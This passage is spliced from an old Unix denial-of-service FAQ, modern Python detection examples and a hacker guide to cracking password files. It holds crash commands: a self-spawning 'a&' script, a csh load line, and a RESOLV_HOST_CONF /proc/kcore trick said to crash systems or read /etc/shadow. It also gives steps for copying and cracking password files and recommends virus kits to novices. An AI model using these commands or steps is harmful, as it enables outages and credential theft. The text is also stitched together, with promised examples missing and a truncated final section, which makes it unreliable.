then inetd will keep going "forever". Well, a couple of hundred...

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------

Some systems disable an account after N bad logins, or wait N seconds. You can use this feature to lock out specific users from the system.

.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------

Inetd under Linux is known to crash if too many SYN packets are sent to daytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES
------------------------------

Most Unix systems disable a service after N sessions have been opened in a given time. Well, most systems have a reasonable default (let's say 800 - 1000), but not some SunOS systems that have the default set to 48...

The solution is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4
---------------------------

If someone redirects an ICMP (Internet Control Message Protocol) packet to a Paragon OS beta R1.4 host, the machine will freeze up and must be rebooted. An ICMP redirect tells the system to override its routing tables. Routers use this to tell the host that it is sending to the wrong router.

The solution is to install the proper patch.

.C.12. NOVELL'S NETWARE FTP
--------------------------

Novell's Netware FTP server is known to run short of memory if multiple ftp sessions connect to it.

.C.13. ICMP REDIRECT ATTACKS
----------------------------

Gateways use ICMP redirects to tell the system to override its routing tables, that is, telling the system to take a better way. To be able to misuse ICMP redirection we must know an existing connection (well, we could make one for ourselves, but there is not much use for that). If we have found a connection we can send a route that loses its connectivity, or we could send false messages to the host if the connection we have found does not use encryption.

The solution could be to turn ICMP redirects off; there is not much proper use of the service.

.C.14. BROADCAST STORMS
-----------------------

This is a very popular method in networks where all of the hosts are acting as gateways.

There are many versions of the attack, but the basic method is to send a lot of packets to all hosts in the network with a destination that does not exist. Each host will try to forward each packet, so the packets will bounce around for a long time. And if new packets keep coming, the network will soon be in trouble.

Services that can be misused as tools in this kind of attack are for example ping, finger and sendmail. But most services can be misused in some way or another.

.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------

In an email bombing attack the attacker will repeatedly send identical email messages to an address. The effect on the target is high bandwidth, a hard disk with less space and so on... Email spamming is about sending mail to all (or rather many) of the users of a system. The point of using spamming instead of bombing is that some users will try to send a reply, and if the address is false the mail will bounce back. In that case one mail has been transformed into three mails. The effect on the bandwidth is obvious.

There is no way to prevent email bombing or spamming. However, have a look at CERT's paper "Email bombing and spamming".

.C.16. TIME AND KERBEROS
------------------------

If the clocks of the source and target machine are not closely aligned, the ticket will be rejected. That means that if the protocol that sets the time is not protected, it will be possible to put a Kerberos server out of function.

.C.17. THE DOT DOT BUG
----------------------

The Windows NT file sharing system is vulnerable to the dot dot bug (dot dot as in ..) famous under Windows 95. Meaning that anyone can crash the system. If someone sends a "DIR ..\" to the workstation, a STOP message will appear on the screen of the Windows NT computer. Note that it applies to versions 3.50 and 3.51 for both the workstation and the server version.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC
-------------------------

Some SunOS systems (running TIS?) will get a kernel panic if a getsockopt() is done after a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS
----------------------

A hostile applet is any applet that attempts to use your system in an inappropriate manner. The problems in the Java language could be sorted into two main groups:

1) Problems due to bugs.
2) Problems due to features in the language.

In group one we have for example the Java bytecode verifier bug, which makes it possible for an applet to execute any command that the user can execute. Meaning that all the attack methods described in .D.X. could be executed through an applet. The Java bytecode verifier bug was discovered in late March 1996 and no patch has yet been made available (correct me if I am wrong!!!).

Note that two other bugs could be found in group one, but they are both fixed in Netscape 2.01 and JDK 1.0.1.

Group two is more interesting, and one large problem found is the fact that Java can connect to the ports. Meaning that all the methods described in .C.X. can be performed by an applet. More information and examples could be found at address:

http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort of firewall for protection against Java. As a user you could have Java disabled.

.C.20. VIRUS
------------

A computer virus is written for the purpose of spreading and destroying systems. Viruses are still the most common and famous denial of service attack method.

It is a misunderstanding that virus writing is hard. If you know assembly language and have source code for a couple of viruses it is easy. Several automatic toolkits for virus construction could also be found, for example:

PS-MPC and VCL are known to be the best and can help the novice programmer to learn how to write viruses.

An automatic tool called MtE could also be found. MtE will transform a virus into a polymorphic virus. The polymorphic engine of MtE is well known and should easily be caught by any scanner.

.C.21. ANONYMOUS FTP ABUSE
--------------------------

If an anonymous FTP archive has a writable area it could be misused for a denial of service attack similar to .D.3. That is, we can fill up the hard disk.

Also, a host can become temporarily unusable under massive numbers of FTP requests.

For more information on how to protect an anonymous FTP site, CERT's "Anonymous FTP Abuses" could be a good start.

.C.22. SYN FLOODING
-------------------

Both 2600 and Phrack have posted information about the SYN flooding attack. 2600 has also posted exploit code for the attack.

As we know, the SYN packet is used in the 3-way handshake. The SYN flooding attack is based on an incomplete handshake. That is, the attacker host will send a flood of SYN packets but will not respond with an ACK packet. The TCP/IP stack will wait a certain amount of time before dropping the connection; a SYN flooding attack will therefore keep the SYN_RECEIVED connection queue of the target machine filled.

The SYN flooding attack is very hot and it is easy to find more information about it, for example:

[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
      Article by Christopher Klaus, including a "solution".
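Since .C.5. notes that netstat reveals this kind of attack, and .C.22. describes the symptom as a full SYN_RECEIVED queue, here is an added detection example (not from the original text) that counts half-open TCP connections per local port in `netstat -an` output. The netstat lines and the threshold are constructed for the example; a real backlog limit depends on the stack.

```python
"""Spot a SYN flood (.C.22.) in netstat output, the check .C.5. points to."""
from collections import Counter, defaultdict

# Constructed sample of `netstat -an` lines: a burst of half-open connections
# to port 80 from unreachable sources, plus ordinary traffic on 80 and 23.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address      Foreign Address    State
tcp        0      0 192.0.2.10:80      198.51.100.7:3241  ESTABLISHED
tcp        0      0 192.0.2.10:80      203.0.113.5:1025   SYN_RECV
tcp        0      0 192.0.2.10:80      203.0.113.6:1026   SYN_RECV
tcp        0      0 192.0.2.10:80      203.0.113.7:1027   SYN_RECV
tcp        0      0 192.0.2.10:80      203.0.113.8:1028   SYN_RECV
tcp        0      0 192.0.2.10:80      203.0.113.9:1029   SYN_RECV
tcp        0      0 192.0.2.10:23      198.51.100.9:4410  SYN_RECV
tcp        0      0 192.0.2.10:23      198.51.100.2:4411  ESTABLISHED
"""

HALF_OPEN = {"SYN_RECV", "SYN_RECEIVED"}  # Linux and BSD spellings of the state


def half_open_by_port(netstat_text):
    """Return {local_port: (count, distinct_sources)} for half-open TCP connections."""
    counts = Counter()
    sources = defaultdict(set)
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] != "tcp" or f[5] not in HALF_OPEN:
            continue  # header, non-TCP, or a completed connection
        local_port = f[3].rsplit(":", 1)[1]
        remote_host = f[4].rsplit(":", 1)[0]
        counts[local_port] += 1
        sources[local_port].add(remote_host)
    return {p: (counts[p], len(sources[p])) for p in counts}


def flooded_ports(netstat_text, threshold=5):
    """Ports whose half-open count reaches the threshold: likely SYN flood targets.
    The threshold is a constructed value; tune it to the host's listen backlog."""
    return sorted(p for p, (n, _srcs) in half_open_by_port(netstat_text).items()
                  if n >= threshold)


if __name__ == "__main__":
    stats = half_open_by_port(SAMPLE_NETSTAT)
    for port in flooded_ports(SAMPLE_NETSTAT):
        n, srcs = stats[port]
        print(f"port {port}: {n} half-open connections from {srcs} distinct sources")
```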

Other well-known methods are files with odd characters or spaces in the name.

These methods could be used in combination with ".D.3 FILLING UP THE HARDDISK". If you do want to remove these files you must use some sort of script or a graphical interface like OpenWindows' File Manager. You can also try to use: rm ./. It should work for the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUP CACHE
--------------------------------

The directory name lookup cache (DNLC) is used whenever a file is opened. DNLC associates the name of the file with a vnode. But DNLC can only operate on files with names that have less than N characters (for SunOS 4.x up to 14 characters, for Solaris 2.x up to 30 characters). This means that it's dead easy to launch a pretty discreet denial of service attack.

Create, let's say, 20 directories (for a start) and put 10 empty files in every directory. Let every name have over 30 characters and execute a script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch more processes.

.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification) and the load level will get very high (that is, 100% of the CPU time) in a very short time.

Ex:

|I /bin/csh nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs create files in /tmp, but are unable to deal with the problem if the file already exists. In some cases this could be used for a denial of service attack.
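The fix on the program side is to create the temporary file exclusively, so that a pre-existing name is refused instead of silently reused. This added example (not from the original text) shows the fragile pattern .D.9. describes beside its exclusive-create counterpart; it uses a private temporary directory standing in for /tmp, and the planted file name is constructed.

```python
"""Fragile versus exclusive creation of a temp file (.D.9.)."""
import os
import tempfile

# O_NOFOLLOW is absent on some platforms; 0 keeps the flag set valid there.
O_NOFOLLOW = getattr(os, "O_NOFOLLOW", 0)


def create_fragile(path):
    """O_CREAT without O_EXCL: succeeds whether or not the name already exists,
    so a file somebody else planted under that name is quietly reused/truncated."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    os.close(fd)
    return "opened"


def create_exclusive(path):
    """O_EXCL (plus O_NOFOLLOW): the open fails if anything already sits at the
    name, so the program can refuse or pick another name instead of misbehaving."""
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | O_NOFOLLOW, 0o600)
    except FileExistsError:
        return "refused"
    os.close(fd)
    return "created"


def demo():
    """Plant a file in a private temp dir (stands in for /tmp) and try both ways."""
    with tempfile.TemporaryDirectory() as d:
        planted = os.path.join(d, "prog.tmp")  # constructed name
        with open(planted, "w") as f:
            f.write("planted by someone else\n")
        fragile = create_fragile(planted)                      # "opened"
        exclusive = create_exclusive(planted)                  # "refused"
        fresh = create_exclusive(os.path.join(d, "prog2.tmp"))  # "created"
        return fragile, exclusive, fresh


if __name__ == "__main__":
    print(demo())
```

In practice, tempfile.mkstemp() does the exclusive create with a random name for you.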

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the RESOLV_HOST_CONF variable. That is, we can put things in it and through ping access confidential data like /etc/shadow, or crash the system. Most systems will crash if /proc/kcore is put in the variable and accessed through ping.

Ex:

$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------

Thanks to Mr David Honig for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a". Running "a" will quickly disable a Sun 4.x machine, even disallowing (counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the script, and how few keystrokes it takes to bring down a Sun as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------

ulimit is used to set a limit on the system resources available to the shell. If ulimit 0 is called before /etc/passwd, under DG/UX, the passwd file will be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX, meaning that any user can reset all ICMP, IP and TCP kernel parameters, for example the following parameters:

This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text). Below is another example of a shadowed password file:

Shadowed password files have an "x" in the place of a password, or sometimes they are disguised with an * as well.
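An administrator can turn the description above into a check: every password field in a world-readable passwd file should be a placeholder ("x" or "*" as described, "!" being the lock marker Linux also uses), never a real hash and never empty. This is an added audit example, not part of the original text; the sample passwd entries and the hash for bob are constructed.

```python
"""Audit a passwd file for entries that are not shadowed."""

# Placeholders that mean "the real hash lives in /etc/shadow" or "locked".
SHADOW_MARKERS = {"x", "*", "!", "!!"}

# Constructed sample passwd: three shadowed entries, one exposed hash, one
# empty password. bob's hash is made up and matches no real password.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/sh
bob:ab5FAKEhashXYZ:1001:1001:Bob:/home/bob:/bin/sh
eve::1002:1002:Eve:/home/eve:/bin/sh
"""


def classify(line):
    """Return (user, status) with status shadowed/exposed/empty, or None if malformed."""
    fields = line.strip().split(":")
    if len(fields) != 7 or not fields[0]:
        return None  # passwd(5) lines have exactly seven colon-separated fields
    user, pw = fields[0], fields[1]
    if pw in SHADOW_MARKERS:
        return user, "shadowed"  # hash is in root-only /etc/shadow
    if pw == "":
        return user, "empty"     # no password at all
    return user, "exposed"       # hash sits in the world-readable file


def audit(text):
    """Map every well-formed entry to its status, in file order."""
    results = (classify(l) for l in text.splitlines() if l.strip())
    return {user: status for user, status in (r for r in results if r is not None)}


def problems(text):
    """Users whose entry is not shadowed: candidates for copy-and-crack."""
    return [user for user, status in audit(text).items() if status != "shadowed"]


if __name__ == "__main__":
    for user in problems(SAMPLE_PASSWD):
        print(f"{user}: {audit(SAMPLE_PASSWD)[user]} password field, move it to /etc/shadow")
```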

Now that you know a little more about what the actual password file looks like, you should be able to tell a normal encrypted pw file from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1. The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon; it will be called Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well, I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link: